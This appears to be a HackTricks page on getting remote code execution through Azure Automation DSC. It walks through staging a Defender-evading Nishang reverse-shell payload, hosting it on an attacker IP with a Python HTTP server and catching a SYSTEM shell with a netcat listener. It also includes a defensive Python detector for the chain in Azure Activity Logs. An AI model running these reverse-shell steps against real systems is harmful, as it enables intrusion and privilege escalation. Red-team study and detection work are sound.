Az - State Configuration RCE
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Check the complete post in: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe
Summary of Remote Server (C2) Infrastructure Preparation and Steps
Overview
The process involves setting up a remote server infrastructure to host a modified Nishang Invoke-PowerShellTcp.ps1 payload, named RevPS.ps1, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP 40.84.7.74 using a simple Python HTTP server. The operation is executed through several steps:
Step 1 — Create Files
- Files Required: Two PowerShell scripts are needed: the DSC configuration file, reverse_shell_config.ps1, and the reverse-shell payload, RevPS.ps1.
- Customization: Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers.
Step 2 — Zip Configuration File
- The reverse_shell_config.ps1 file is compressed into a .zip file, making it ready for transfer to the Azure Storage Account.
```powershell
Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
```
Step 3 — Set Storage Context & Upload
- The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet.
```powershell
Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
```
Step 4 — Prep Kali Box
- The Kali server downloads the RevPS.ps1 payload from a GitHub repository.
```bash
wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
```
- The script is edited to specify the target Windows VM and port for the reverse shell.
Step 5 — Publish Configuration File
- The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM.
Step 6 — Host Payload and Setup Listener
- A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections.
```bash
sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
```
- The scheduled task executes the payload, achieving SYSTEM-level privileges.
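From the defender's side, the chain above leaves a recognisable trace in the Azure Activity Log: a DSC configuration is written to an Automation account and a compilation job follows shortly after from the same caller. The Python below is an added example (not code from the original post or the linked write-up) that flags that pattern over JSON-lines Activity Log records; the operation-name strings are assumed from the Microsoft.Automation resource provider and the sample records are constructed, so verify both against your own exports.

```python
import json
from datetime import datetime, timedelta

# Operation names assumed from the Microsoft.Automation resource provider;
# confirm the exact strings against your own Activity Log exports.
PUBLISH_OP = "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/CONFIGURATIONS/WRITE"
COMPILE_OP = "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/COMPILATIONJOBS/WRITE"

# Constructed sample Activity Log records (JSON lines), not data from any real tenant.
SAMPLE_LOG = """
{"time":"2024-05-01T10:00:00Z","caller":"ops@example.test","operationName":"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE","resourceId":"/subscriptions/sub/resourceGroups/rg/providers/Microsoft.Storage/storageAccounts/sa/blobServices/default/containers/azure-pentest"}
{"time":"2024-05-01T10:05:00Z","caller":"svc@example.test","operationName":"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/CONFIGURATIONS/WRITE","resourceId":"/subscriptions/sub/resourceGroups/rg/providers/Microsoft.Automation/automationAccounts/aa/configurations/reverse_shell_config"}
{"time":"2024-05-01T10:07:00Z","caller":"svc@example.test","operationName":"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/COMPILATIONJOBS/WRITE","resourceId":"/subscriptions/sub/resourceGroups/rg/providers/Microsoft.Automation/automationAccounts/aa/compilationjobs/job-0001"}
{"time":"2024-05-02T09:00:00Z","caller":"admin@example.test","operationName":"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/CONFIGURATIONS/WRITE","resourceId":"/subscriptions/sub/resourceGroups/rg/providers/Microsoft.Automation/automationAccounts/aa/configurations/baseline"}
"""


def parse_events(raw):
    """Parse JSON-lines records and return them sorted by event time."""
    events = []
    for line in raw.strip().splitlines():
        event = json.loads(line)
        event["time"] = datetime.strptime(event["time"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(event)
    return sorted(events, key=lambda e: e["time"])


def detect_dsc_chain(events, window=timedelta(hours=1)):
    """Report every DSC configuration publish. A publish that the same caller
    follows with a compilation job inside `window` is rated high (the full
    chain from the post); a publish with no compile is rated medium."""
    publishes = [e for e in events if e["operationName"].upper() == PUBLISH_OP]
    compiles = [e for e in events if e["operationName"].upper() == COMPILE_OP]
    findings = []
    for pub in publishes:
        paired = [c for c in compiles
                  if c["caller"] == pub["caller"]
                  and timedelta(0) <= c["time"] - pub["time"] <= window]
        findings.append({
            "caller": pub["caller"],
            "configuration": pub["resourceId"].rsplit("/", 1)[-1],
            "severity": "high" if paired else "medium",
            "compiled_at": paired[0]["time"].isoformat() if paired else None,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_dsc_chain(parse_events(SAMPLE_LOG)):
        print(finding)
```

Pair a high-severity hit with the storage-account write that precedes it (the blob upload from Step 3) to recover the staged configuration for review.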
Conclusion
The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC.